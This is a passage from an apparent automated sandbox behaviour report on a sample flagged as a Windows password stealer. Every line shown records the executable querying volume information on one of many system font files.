                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
